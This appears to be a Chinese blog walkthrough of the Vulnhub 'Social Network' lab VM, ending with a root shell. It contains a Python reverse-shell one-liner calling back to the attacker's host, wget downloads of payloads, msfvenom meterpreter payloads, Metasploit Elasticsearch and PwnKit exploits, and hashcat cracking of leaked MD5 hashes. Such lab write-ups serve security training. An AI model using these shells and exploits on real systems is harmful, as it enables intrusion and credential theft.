Vulnhub之BoredHackerBlog: Social Network_Medium Socnet详细测试过程(拿到root shell)

这篇具有很好参考价值的文章主要介绍了Vulnhub之BoredHackerBlog: Social Network_Medium Socnet详细测试过程(拿到root shell)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

BoredHackerBlog: Social Network

作者:jason huawen

靶机信息

名称:

BoredHackerBlog: Social Network

地址:

https://www.vulnhub.com/entry/boredhackerblog-social-network,454/

识别目标主机IP地址

Currently scanning: Finished!   |   Screen View: Unique Hosts                                                               

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:06      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:af:83:c9      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.254  08:00:27:87:d5:96      1      60  PCS Systemtechnik GmbH       

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/Socnet]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-08 00:38 EDT
Nmap scan report for www.armour.local (192.168.56.254)
Host is up (0.00029s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 cc5320b810db525f1602bcee572280e1 (DSA)
|   2048 0150f61f32e80dfc48383ec81bac2002 (RSA)
|   256 3bae9abdcbff8f546432ecbf38fdfe6b (ECDSA)
|_  256 774e8b207352a4ee931db385f225d755 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.14.1 (Python 2.7.15)
|_http-title: Leave a message
MAC Address: 08:00:27:87:D5:96 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、5000(http)

获得Shell

──(kali㉿kali)-[~/Vulnhub/Socnet]
└─$ gobuster dir -u http://192.168.56.254:5000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.254:5000
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              js,html,txt,sh,php
[+] Timeout:                 10s
===============================================================
2023/04/08 00:44:15 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 200) [Size: 401]

发现了/admin目录,而我们在namp结果知道目标运行Python环境

当输入正确的python代码时,比如print("jason"),返回结果:

Status:

Ran the code

当故意输入有错误的python代码时,则返回结果:

Status:

Something went wrong with running the code

因此接下来设法得到反向shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

这里不需要前面的python -c

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.206",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
┌──(kali㉿kali)-[~/Vulnhub/Socnet]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 39946
/app # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/app # ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
4: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP 
    link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
       valid_lft forever preferred_lft forever
/app # 

这应该是在容器中。

将编译后的nmap上传到目标容器中

/app # which wget
/usr/bin/wget
/app # cd /tmp
/tmp # wget http://192.168.56.206:8000/nmap
Connecting to 192.168.56.206:8000 (192.168.56.206:8000)
nmap                 100% |*******************************|  5805k  0:00:00 ETA

/tmp # chmod +x nmap
/tmp # ./nmap 172.17.0./16
/tmp # ./nmap 172.17.0.0/24 

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2023-04-08 05:00 UTC
Unable to find nmap-services!  Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for 172.17.0.1
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (0.000042s latency).
Not shown: 1288 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
MAC Address: 02:42:A1:9D:B7:15 (Unknown)

Nmap scan report for 172.17.0.3
Host is up (0.000044s latency).
Not shown: 1288 closed ports
PORT     STATE SERVICE
9200/tcp open  wap-wsp
MAC Address: 02:42:AC:11:00:03 (Unknown)

经过扫描发现172.17.0.3容器开放9200端口,运行elasticsearch服务

接下来利用metasploit工具生成meterpreter会话

┌──(kali㉿kali)-[~/Vulnhub/Socnet]
└─$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.206 LPORT=6666 -f elf -o escalate.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
Saved as: escalate.elf

将Mesfvenom工具生成的escalate.elf文件上传之目标容器(172.17.0.2)

/tmp # wget http://192.168.56.206:8000/escalate.elf
Connecting to 192.168.56.206:8000 (192.168.56.206:8000)
escalate.elf         100% |*******************************|   207   0:00:00 ETA

/tmp # chmod +x escalate.elf
/tmp # ./escalate.elf
Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set LHOST 192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.56.206:6666 
[*] Sending stage (1017704 bytes) to 192.168.56.254
[*] Meterpreter session 1 opened (192.168.56.206:6666 -> 192.168.56.254:53521) at 2023-04-08 01:11:37 -0400

meterpreter > 

在Kali Linux上成功得到meterpreter会话,接下里建立端口转发,到172.17.0.3的elasticservice端口

meterpreter > run autoroute -s 172.17.0.0/16
meterpreter > portfwd add -l 9200 -p 9200 -r 172.17.0.3
[*] Forward TCP relay created: (local) :9200 -> (remote) 172.17.0.3:9200
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > search elasticsearch

Matching Modules
================

   #  Name                                              Disclosure Date  Rank       Check  Description
   -  ----                                              ---------------  ----       -----  -----------
   0  exploit/multi/elasticsearch/script_mvel_rce       2013-12-09       excellent  Yes    ElasticSearch Dynamic Script Arbitrary Java Execution
   1  auxiliary/scanner/elasticsearch/indices_enum                       normal     No     ElasticSearch Indices Enumeration Utility
   2  exploit/multi/elasticsearch/search_groovy_script  2015-02-11       excellent  Yes    ElasticSearch Search Groovy Sandbox Bypass
   3  auxiliary/scanner/http/elasticsearch_traversal                     normal     Yes    ElasticSearch Snapshot API Directory Traversal
   4  exploit/multi/misc/xdh_x_exec                     2015-12-04       excellent  Yes    Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/multi/misc/xdh_x_exec

msf6 exploit(multi/handler) > use exploit/multi/elasticsearch/search_groovy_script
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/elasticsearch/search_groovy_script) > show options 

Module options (exploit/multi/elasticsearch/search_groovy_script):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/us
                                         ing-metasploit.html
   RPORT      9200             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The path to the ElasticSearch REST API
   VHOST                       no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   ElasticSearch 1.4.2



View the full module info with the info, or info -d command.

msf6 exploit(multi/elasticsearch/search_groovy_script) > set RHOSTS localhost
RHOSTS => localhost
msf6 exploit(multi/elasticsearch/search_groovy_script) > set LHOST 192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(multi/elasticsearch/search_groovy_script) > set LPORT 8888
LPORT => 8888
msf6 exploit(multi/elasticsearch/search_groovy_script) > run
[*] Exploiting target 0.0.0.1

[*] Started reverse TCP handler on 192.168.56.206:8888 
[*] Checking vulnerability...
[-] Exploit aborted due to failure: unknown: 0.0.0.1:9200 - Java has not been executed, aborting...
[*] Exploiting target 127.0.0.1
[*] Started reverse TCP handler on 192.168.56.206:8888 
[*] Checking vulnerability...
[*] Discovering TEMP path...
[+] TEMP path on '/tmp'
[*] Discovering remote OS...
[+] Remote OS is 'Linux'
[*] Trying to load metasploit payload...
[*] Sending stage (58829 bytes) to 192.168.56.254
[+] Deleted /tmp/IVCQL.jar
[*] Meterpreter session 2 opened (192.168.56.206:8888 -> 192.168.56.254:55487) at 2023-04-08 01:17:49 -0400
[*] Session 2 created in the background.
msf6 exploit(multi/elasticsearch/search_groovy_script) > sessions -l

Active sessions
===============

  Id  Name  Type                    Information          Connection
  --  ----  ----                    -----------          ----------
  1         meterpreter x86/linux   root @ 172.17.0.2    192.168.56.206:6666 -> 192.168.56.254:53521 (172.17.0.2)
  2         meterpreter java/linux  root @ 2c3ee4ccef61  192.168.56.206:8888 -> 192.168.56.254:55487 (127.0.0.1)

在172.17.0.3的shell中发现文件passwords

cat passwords
Format: number,number,number,number,lowercase,lowercase,lowercase,lowercase
Example: 1234abcd
john:3f8184a7343664553fcb5337a3138814 
test:861f194e9d6118f3d942a72be3e51749
admin:670c3bbc209a18dde5446e5e6c1f1d5b
root:b3d34352fc26117979deabdf1b9b6354
jane:5c158b60ed97c723b673529b8a3cf72b

并且给出了密码的格式:

number,number,number,number,lowercase,lowercase,lowercase,lowercase

数字数字数字数字数字小写字母小写字母小写字母

接下里用hashcat进行破解

(kali㉿kali)-[~/Vulnhub/Socnet]
└─$ hashcat --username -m 0 -a 3 hashes  -1 ?d -2 ?l ?1?1?1?1?2?2?2?2 --force
5c158b60ed97c723b673529b8a3cf72b:1234jane                 
b3d34352fc26117979deabdf1b9b6354:1234pass                 
670c3bbc209a18dde5446e5e6c1f1d5b:1111pass                 
861f194e9d6118f3d942a72be3e51749:1234test      

得到john等的用户的密码,登录john的ssh:

然后

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.206 LPORT=6666 -f elf -o escalate.elf

将该payload上传到目标主机,同时在Kali LInux启动msfconsole,从而得到meterpreter会话,得到meterpreter会话后,利用suggester模块找到本地提权模块,然后提权到root

msf6 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show options 

Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PKEXEC_PATH                    no        The path to pkexec binary
   SESSION                        yes       The session to run this module on
   WRITABLE_DIR  /tmp             yes       A directory where we can write files


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   x86_64



View the full module info with the info, or info -d command.

msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 8888
LPORT => 8888
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run

[*] Started reverse TCP handler on 192.168.56.206:8888 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.uvuqtex
[+] The target is vulnerable.
[*] Writing '/tmp/.qzwtfgo/woyhnxwzfn/woyhnxwzfn.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.qzwtfgo

meterpreter >  shell
Process 1737 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),1001(john)
cd /root
ls -alh
total 20K
drwx------  2 root root 4.0K Oct 28  2018 .
drwxr-xr-x 22 root root 4.0K Oct 27  2018 ..
-rw-------  1 root root    9 Oct 28  2018 .bash_history
-rw-r--r--  1 root root 3.1K Feb 19  2014 .bashrc
-rw-r--r--  1 root root  140 Feb 19  2014 .profile

从而得到root shell.文章来源地址https://www.toymoban.com/news/detail-404394.html

到了这里,关于Vulnhub之BoredHackerBlog: Social Network_Medium Socnet详细测试过程(拿到root shell)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • [论文阅读笔记24]Social-STGCNN: A Social Spatio-Temporal GCNN for Human Traj. Pred.

    论文: 论文地址 代码: 代码地址 作者在这篇文章中直接用GNN对目标的轨迹时空特征进行建模, 并用时序CNN进行预测, 代替了训练难度较大和速度较慢的RNN类方法. 行人轨迹预测是一个比较有挑战性的任务, 有着许多的应用. 一个行人的轨迹不仅是由自己决定的, 而且受其周围目标

    2024年02月16日
    浏览(44)
  • 【算法专题--双指针算法】leecode-15.三数之和(medium)、leecode-18. 四数之和(medium)

    🍁你好,我是 RO-BERRY 📗 致力于C、C++、数据结构、TCP/IP、数据库等等一系列知识 🎄感谢你的陪伴与支持 ,故事既有了开头,就要画上一个完美的句号,让我们一起加油 双指针 常见的双指针有两种形式,一种是对撞指针,⼀种是左右指针。 对撞指针:一般用于顺序结构中

    2024年04月09日
    浏览(50)
  • 1300*C. Social Distance(贪心&构造)

    Problem - 1367C - Codeforces   解析:          统计出所有连续0序列,并且记录其左右两侧有没有1,然后对于四种情况分别判断即可。

    2024年02月06日
    浏览(60)
  • 【算法专题--双指针算法】leecode-202. 快乐数(medium)、leecode-11. 盛最多水的容器(medium)

    🍁你好,我是 RO-BERRY 📗 致力于C、C++、数据结构、TCP/IP、数据库等等一系列知识 🎄感谢你的陪伴与支持 ,故事既有了开头,就要画上一个完美的句号,让我们一起加油 双指针 常见的双指针有两种形式,一种是对撞指针,⼀种是左右指针。 对撞指针:一般用于顺序结构中

    2024年03月23日
    浏览(39)
  • hackthebox --interface medium

    nmap -sV -sC -O -p22,80 10.10.11.200 -oN ports   访问80页面,主页面是这样的  再访问一下index.php或者index.html 发现是404错误, 有可能是里面隐藏了一些api我们可以查看到搜索看看有没有类似的api泄露 利用f12查看js源码 搜索http:// 或者/ 或者/upload 这里搜索到的是/api  说明这里是有可能跳

    2024年02月06日
    浏览(36)
  • 【leetcode】15. 三数之和(medium)

    给你一个整数数组 nums ,判断是否存在三元组 [nums[i], nums[j], nums[k]] 满足 i != j、i != k 且 j != k ,同时还满足 nums[i] + nums[j] + nums[k] == 0 。请 你返回所有和为 0 且不重复的三元组。 注意:答案中不可以包含重复的三元组。 这题真的好难,试了好多方法,最后参考了代码随想录的

    2024年02月13日
    浏览(61)
  • 【leetcode】18. 四数之和(medium)

    给你一个由 n 个整数组成的数组 nums ,和一个目标值 target 。请你找出并返回满足下述全部条件且不重复的四元组 [nums[a], nums[b], nums[c], nums[d]] (若两个四元组元素一一对应,则认为两个四元组重复): 0 = a, b, c, d n a、b、c 和 d 互不相同 nums[a] + nums[b] + nums[c] + nums[d] == target 你

    2024年02月13日
    浏览(44)
  • HackTheBox - Medium - Linux - Health

    Health 是一台中型 Linux 计算机,在主网页上存在 SSRF 漏洞,可利用该漏洞访问仅在 localhost 上可用的服务。更具体地说,Gogs 实例只能通过 localhost 访问,并且此特定版本容易受到 SQL 注入攻击。由于攻击者可以与 Gogs 实例交互的方式,在这种情况下,最好的方法是通过在本地计

    2024年01月18日
    浏览(52)
  • HackTheBox - Medium - Linux - Faculty

    Faculty 是一台中型 Linux 机器,具有 PHP Web 应用程序,该应用程序使用的库容易受到本地文件包含的影响。利用该库中的 LFi 会泄露一个密码,该密码可用于通过 SSH 以名为“gbyolo”的低级用户身份登录。用户“gbyolo”有权作为“developer”用户运行名为“meta-git”的“npm”包。此

    2024年01月22日
    浏览(37)
  • HackTheBox - Medium - Linux - BroScience

    BroScience 是一款中等难度的 Linux 机器,其特点是 Web 应用程序容易受到“LFI”的攻击。通过读取目标上的任意文件的能力,攻击者可以深入了解帐户激活码的生成方式,从而能够创建一组可能有效的令牌来激活新创建的帐户。登录后,进一步枚举显示该站点\\\'的主题选择器功能

    2024年02月03日
    浏览(34)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包